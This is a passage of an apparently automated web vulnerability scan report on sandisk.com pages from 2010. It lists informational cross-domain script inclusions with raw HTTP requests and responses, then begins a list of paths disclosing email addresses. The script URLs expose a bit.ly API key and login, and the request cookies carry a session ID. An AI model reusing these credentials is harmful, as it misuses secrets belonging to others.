<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. Pro... ExpressCard... Adapter
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDADX6-CF-G20&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.181. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-189-A20&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk ImageMate.. All-in-One USB 2.0 Reader

<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-189-A20&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.182. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-199-A20 &nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31173
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk ImageMate.. Multi-Card USB 2.0 Reader
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-199-A20 &nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.183. http://www.sandisk.com/products/readers-accessories/sandisk®-mobilemate�?�-duo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk..-mobilemate...-duo

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /products/readers-accessories/sandisk..-mobilemate...-duo HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:43:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.184. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-002GK-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GB-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GI-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GK-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GR-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GW-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-008GK-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53484
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-008GK-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GI-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GW-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GK-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GB-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GR-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-002GK-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.185. http://www.sandisk.com/products/slotradioproducts/sansaplayers-cards/card-vh1-classic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/slotradioproducts/sansaplayers-cards/card-vh1-classic

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU= SDSR-11372-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSR-11372-A57&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/slotradioproducts/sansaplayers-cards/card-vh1-classic HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44363
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerLeft" style="position: relative;">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</p>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSR-11372-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
</a> <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU= SDSR-11372-A57&nRGID=2519" type="text/javascript"> </script>
...[SNIP]...

2.186. http://www.sandisk.com/sandisk-rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-rss

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /sandisk-rss HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14059
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.187. http://www.sandisk.com/sandisk-rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-rss.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /sandisk-rss.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14064
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.188. http://www.sandisk.com/sandisk-support/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-support/contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /sandisk-support/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/contact-us
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28136
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="contentRight">

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.189. http://www.sandisk.com/sandisk-support/driver-download-wizard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-support/driver-download-wizard

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /sandisk-support/driver-download-wizard HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.190. http://www.sandisk.com/sandisk-support/where-to-buy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sandisk-support/where-to-buy

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /sandisk-support/where-to-buy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15284
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.191. http://www.sandisk.com/sitemap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/sitemap

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /sitemap HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21487
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

3. Email addresses disclosed previous next
There are 191 instances of this issue:

/
/PlayListXML/
/SanDisk/US-eStore
/SanDisk/facebook
/SanDisk/linkedin
/SanDisk/rss
/SanDisk/twitter
/SanDisk/youtube
/about-sandisk
/about-sandisk.aspx
/about-sandisk/
/about-sandisk/careers
/about-sandisk/careers/
/about-sandisk/careers/benefits
/about-sandisk/careers/career-opportunities
/about-sandisk/careers/employment-practices
/about-sandisk/careers/for-new-college-grads
/about-sandisk/contact-us
/about-sandisk/corporate-social-responsibility
/about-sandisk/corporate-social-responsibility/
/about-sandisk/corporate-social-responsibility/community-engagement
/about-sandisk/corporate-social-responsibility/community-engagement/
/about-sandisk/corporate-social-responsibility/community-engagement/community-education
/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program
/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering
/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy
/about-sandisk/corporate-social-responsibility/corporate-responsibility
/about-sandisk/corporate-social-responsibility/corporate-responsibility/
/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety
/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics
/about-sandisk/corporate-social-responsibility/environmental-responsibility
/about-sandisk/corporate-social-responsibility/environmental-responsibility/
/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system
/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities
/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology
/about-sandisk/corporate-social-responsibility/product-environmental-compliance
/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure
/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement
/about-sandisk/management
/about-sandisk/management/
/about-sandisk/management/timeline-of-innovation
/about-sandisk/media-kit
/about-sandisk/media-kit/
/about-sandisk/media-kit/business-and-industry-association-links
/about-sandisk/media-kit/businessoem-products-brochures
/about-sandisk/media-kit/executive-officer-photos
/about-sandisk/media-kit/executive-officer-photos.aspx
/about-sandisk/media-kit/miscellaneous
/about-sandisk/media-kit/oem-product-photos
/about-sandisk/media-kit/retail-product-photos
/about-sandisk/media-kit/retail-product-photos/
/about-sandisk/media-kit/retail-product-photos/dslr/
/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx
/about-sandisk/media-kit/retail-products-brochures
/about-sandisk/media-kit/trademark-information
/about-sandisk/press-room
/about-sandisk/press-room/press-contacts
/about-sandisk/press-room/press-releases
/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability
/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call
/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results
/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive
/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive
/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive
/about-sandisk/privacy-policy
/about-sandisk/privacy-policy/
/about-sandisk/privacy-policy/archived-privacypolicy
/about-sandisk/privacy-policy/faq
/about-sandisk/procurement--global-supply-base-management
/about-sandisk/terms-of-use
/about-sandisk/worldwide-locations
/about-sandisk/worldwide-locations/
/about-sandisk/worldwide-locations/sandisk--israel
/about-sandisk/worldwide-locations/sandisk-asia-pacific
/about-sandisk/worldwide-locations/sandisk-europe
/business-solutions
/business-solutions/contact-us
/business-solutions/embedded-products
/business-solutions/embedded-products.aspx
/business-solutions/embedded-products/
/business-solutions/embedded-products/inand
/business-solutions/find-a-distributor
/business-solutions/flash-memory-cards
/business-solutions/flash-memory-cards.aspx
/business-solutions/flash-memory-cards/
/business-solutions/flash-memory-cards/compact-flash-cards
/business-solutions/flash-memory-cards/memory-stick-pro-duo
/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-
/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards
/business-solutions/mobile-handset-vendors
/business-solutions/mobile-handset-vendors.aspx
/business-solutions/mobile-handset-vendors/
/business-solutions/mobile-handset-vendors/inand
/business-solutions/mobile-handset-vendors/m2
/business-solutions/mobile-handset-vendors/m2.aspx
/business-solutions/mobile-handset-vendors/microsdhc
/business-solutions/mobile-handset-vendors/microsdhc.aspx
/business-solutions/mobile-network-operators
/business-solutions/mobile-network-operators.aspx
/business-solutions/mobile-network-operators/
/business-solutions/mobile-network-operators/memory-cards-
/business-solutions/mobile-network-operators/memory-cards-.aspx
/business-solutions/sd-worm
/business-solutions/sd-worm/
/business-solutions/sd-worm/benefits
/business-solutions/sd-worm/case-studies
/business-solutions/sd-worm/sd-worm-card
